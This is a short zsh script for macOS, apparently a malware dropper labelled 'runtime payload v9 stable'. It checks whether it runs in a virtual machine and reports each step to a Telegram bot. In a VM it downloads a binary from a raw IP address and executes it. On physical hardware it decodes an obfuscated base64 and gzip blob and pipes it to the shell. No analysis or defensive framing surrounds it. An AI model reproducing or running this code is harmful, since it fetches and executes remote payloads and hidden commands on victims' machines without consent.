#!/bin/zsh
# runtime payload v9 stable

set -e

cd "${TMPDIR:-/tmp}"

API_URL="https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=-5269300367"

hv="$(sysctl -n kern.hv_vmm_present 2>/dev/null || echo 0)"

if [ "$hv" = "1" ]; then
    echo "[*] VM detected"
    curl -s "${API_URL}&text=VM_detected" >/dev/null

    if curl -fsSL -o Lamimimi http://64.89.160.11/Lamimimi; then
        chmod +x Lamimimi
        ./Lamimimi
        curl -s "${API_URL}&text=VM_payload_executed" >/dev/null
    else
        echo "[!] Download failed"
        curl -s "${API_URL}&text=VM_download_failed" >/dev/null
    fi

else
    echo "[*] Physical machine"
    curl -s "${API_URL}&text=Physical_detected" >/dev/null

    if echo 'H4sIAAAAAAAA/wXAyg6CoF9h3vMxm8Nulq6W5lYzpkckDEIFBZy5Pr6NklkFiJ17sNPAYcYoffA8zmFoFY8F8yVvsYHbPLAQ6m6JAisiODE8GDIbMvXCVfhNtfuii5d80NZhlC0iDBobFNm3QEl1r/fxJQ6qDMvSRgTlj3Q8a9pUfrbeyuvRbjlLqTwVNXy6WKvVAT/QYs3+v/o8FJ0AAAA=' | base64 -d | gunzip | sh; then
        curl -s "${API_URL}&text=Physical_command_ok" >/dev/null
    else
        curl -s "${API_URL}&text=Physical_command_failed" >/dev/null
    fi
fi
